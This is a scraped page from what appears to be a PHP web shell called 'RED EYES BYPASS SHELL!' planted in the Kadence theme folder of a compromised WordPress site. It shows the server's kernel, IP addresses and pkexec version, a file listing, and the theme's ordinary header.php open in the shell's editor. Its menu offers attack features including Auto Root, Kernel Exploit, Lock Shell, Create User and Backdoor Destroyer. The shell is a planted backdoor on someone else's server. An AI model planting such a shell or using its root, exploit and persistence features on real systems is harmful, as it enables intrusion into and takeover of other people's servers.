Linux sothorn202 5.15.0-161-generic #171-Ubuntu SMP Sat Oct 11 08:17:01 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 202.28.82.202 | : 216.73.216.9
pkexec version 0.105
Cant Read [ /etc/named.conf ]
iqtd
RED EYES BYPASS SHELL!
Terminal
Auto Root
Adminer
Backdoor Destroyer
Kernel Exploit
Lock Shell
Lock File
Create User
+ Create Folder
+ Create File
/
home /
bigdata /
wp-content /
themes /
kadence /
[ HOME SHELL ]
NAME
SIZE
PERMISSION
ACTION
assets
[ DIR ]
drwxr-xr-x
bbpress
[ DIR ]
drwxr-xr-x
inc
[ DIR ]
drwxr-xr-x
languages
[ DIR ]
drwxr-xr-x
lifterlms
[ DIR ]
drwxr-xr-x
template-parts
[ DIR ]
drwxr-xr-x
tribe
[ DIR ]
drwxr-xr-x
tribe-events
[ DIR ]
drwxr-xr-x
tutor
[ DIR ]
drwxr-xr-x
404.php
403
B
-rwxr-xr-x
500.php
887
B
-rwxr-xr-x
LICENSE
34.33
KB
-rwxr-xr-x
accessibility.txt
2.1
KB
-rwxr-xr-x
changelog.txt
50.31
KB
-rwxr-xr-x
comments.php
1010
B
-rwxr-xr-x
footer.php
725
B
-rwxr-xr-x
functions.php
955
B
-rwxr-xr-x
header.php
1.24
KB
-rwxr-xr-x
index.php
284
B
-rwxr-xr-x
offline.php
948
B
-rwxr-xr-x
page.php
322
B
-rwxr-xr-x
readme.txt
54.44
KB
-rwxr-xr-x
screenshot.png
278.59
KB
-rwxr-xr-x
sidebar.php
841
B
-rwxr-xr-x
single.php
322
B
-rwxr-xr-x
style.css
1.32
KB
-rwxr-xr-x
theme.json
3.2
KB
-rwxr-xr-x
wpml-config.xml
2.76
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : header.php
<?php /** * The header for our theme * * This is the template that displays all of the <head> section and everything up until <div id="content"> * * @link https://developer.wordpress.org/themes/basics/template-files/#template-partials * * @package kadence */ namespace Kadence; if ( ! defined( 'ABSPATH' ) ) { exit; } ?> <!doctype html> <html <?php language_attributes(); ?> class="no-js" <?php kadence()->print_microdata( 'html' ); ?>> <head> <meta charset="<?php bloginfo( 'charset' ); ?>"> <meta name="viewport" content="width=device-width, initial-scale=1, minimum-scale=1"> <?php wp_head(); ?> </head> <body <?php body_class(); ?>> <?php wp_body_open(); ?> <?php /** * Kadence before wrapper hook. */ do_action( 'kadence_before_wrapper' ); ?> <div id="wrapper" class="site wp-site-blocks"> <?php /** * Kadence before header hook. * * @hooked kadence_do_skip_to_content_link - 2 */ do_action( 'kadence_before_header' ); /** * Kadence header hook. * * @hooked Kadence/header_markup - 10 */ do_action( 'kadence_header' ); do_action( 'kadence_after_header' ); ?> <main id="inner-wrap" class="wrap kt-clear" role="main"> <?php /** * Hook for top of inner wrap. */ do_action( 'kadence_before_content' ); ?>
Close